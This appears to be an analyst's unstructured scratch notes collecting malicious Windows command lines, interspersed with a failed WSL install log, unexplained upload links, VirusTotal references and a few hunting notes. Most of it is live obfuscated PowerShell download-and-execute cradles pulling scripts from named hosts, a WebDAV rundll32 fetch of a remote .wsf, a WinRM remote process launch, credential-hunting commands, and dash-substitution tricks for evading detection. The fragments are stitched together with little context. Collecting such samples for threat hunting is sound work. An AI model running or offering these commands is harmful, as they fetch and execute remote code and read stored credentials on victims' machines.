---
# System prepended metadata

title: Untitled

---

PS C:\WINDOWS\system32> wsl --install kali-linux
Downloading: Kali Linux Rolling
Installing: Kali Linux Rolling
WSL2 is not supported with your current machine configuration.
Please enable the "Virtual Machine Platform" optional component and ensure virtualisation is enabled in the BIOS.
Enable "Virtual Machine Platform" by running: wsl.exe --install --no-distribution
For information please visit https://aka.ms/enablevirtualization
Error code: Wsl/InstallDistro/Service/RegisterDistro/CreateVm/HCS/HCS_E_HYPERV_NOT_INSTALLED

LOCALCOMMAND
https://easyupload.io/q457jy

PROXYCOMMAND
https://easyupload.io/nakmel

C:\WINDOWS\system32\cmd.exe /c ""C:\WINDOWS\system32\winrm.cmd" invoke Create wmicimv2/Win32_Process @{CommandLine="cmd /c c:\windows\system32\calc.exe"} -r:http://target:5985"

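Note: the -e argument in the command line below is Base64 of UTF-16LE text. Decoded, it builds the string "http" by concatenation, calls an executable through a wildcard path (\W*\*32\c??l.e*, presumably curl.exe under System32) to fetch hxxps://glcdn[.]info/cdn/s/3638369623, and pipes the response to iex. Hunting pivots: cmd.exe spawning "start /min powershell -e", and the decoded text in PowerShell script block logging (event ID 4104).
Process: c:\windows\system32\cmd.exe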
Command Line: "C:\WINDOWS\system32\cmd.exe" /c start /min powershell  -e JABjAD0AJwBoAHQAJwArACcAdABwACcAOwAoAC4AJwBcAFcAKgBcACoAMwAyAFwAYwA/AD8AbAAuAGUAKgAnACAAIgAkAHsAYwB9AHMAOgAvAC8AZwBsAGMAZABuAC4AaQBuAGYAbwAvAGMAZABuAC8AcwAvADMANgAzADgAMwA2ADkANgAyADMAIgApAHwAaQBlAHgA


https://www.virustotal.com/gui/file/ba5beb189d6e1811605b0a4986b232108d6193dcf09e5b2a603ea4448e6f263c/behavior


"PowerShell.exe" -N"oP"r"OF"I /w h /"COM"ma "$s"r"t15 = 'c"m"b"k"z8b"ui0000"08k"2"2bcm3"b"3k[.]info'; $vls9"1"0 = In"v"o"ke"-"R"e"st"Met"h"od -Uri $srt15; Inv"oke-"Exp"ress"i"o"n $vls910"



powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'google'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"\1


"PowerShell.exe" -nop -w h -ep bypass -Command (&('Start-BitsTransfer') ('https://google.com') ($env:TEMP+'y.ps1')); &($env:TEMP+'y.ps1');$__cfCheck="Confirmation code: 393"'

https://www.virustotal.com/gui/file/082d5935271abf58419fb5e9de83996bd2f840152de595afa7d08e4b98b1d203/community

Command Line: "PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex

"PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex"


PowerShell.exe -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))"


At line:1 char:107
+ ... ring';='https://alvinkahn.com/frodo.ps1';iex ((New-Object (++)).(++). ...
+                                                                  ~
Missing expression after unary operator '++'.
At line:1 char:113
+ ... ='https://alvinkahn.com/frodo.ps1';iex ((New-Object (++)).(++).Invoke ...
+                                                                  ~
Missing expression after unary operator '++'.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingExpressionAfterOperator
    
    
    PowerShell.exe -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))"


PowerShell.exe -Command "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1';iex ((New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a))"



"PowerShell.exe" -c "$t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='hxxps[://]alvinkahn.com/frodo.ps1';(New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a)|iex"


"PowerShell.exe" -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $t='Ne';$y='t.WebCli';$u='ent';$i='Downl';$o='oadS';$p='tring';$a='https://alvinkahn.com/frodo.ps1'; (New-Object ($t+$y+$u)).($i+$o+$p).Invoke($a) | iex"


powershell.exe —EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA=




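Note: PowerShell accepts the three Unicode dashes listed below as a parameter prefix, in addition to the ASCII hyphen (U+002D). Detections that match only on "-EncodedCommand" or "-e" with the ASCII hyphen miss these variants, so normalise dash characters before matching. The Base64 in these samples decodes (UTF-16LE) to Start-Process -FilePath "calc.exe", a harmless test payload.
\x{2013} → EN DASH (–) powershell.exe –EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA=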
\x{2014} → EM DASH (—) powershell.exe —EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA=
\x{2015} → HORIZONTAL BAR (―) powershell.exe ―EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBjAGEAbABjAC4AZQB4AGUAIgA=




VaultCmd.exe /list

from ps:
reg.exe" query HKLM /f password /t REG_SZ /s



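Note: in the sample below, rundll32.exe calls the DavSetCookie export of davclnt.dll so that the Windows WebDAV client connects to the named host over SSL; the second argument points at a remote .wsf script on the same host. Hunting pivots: "davclnt.dll,DavSetCookie" on a rundll32.exe command line, outbound connections to *.trycloudflare.com, and script hosts launched shortly afterwards.
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie singing-organization-crops-total.trycloudflare.com@SSL https://singing-organization-crops-total.trycloudflare.com/subhtel/faush.wsf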

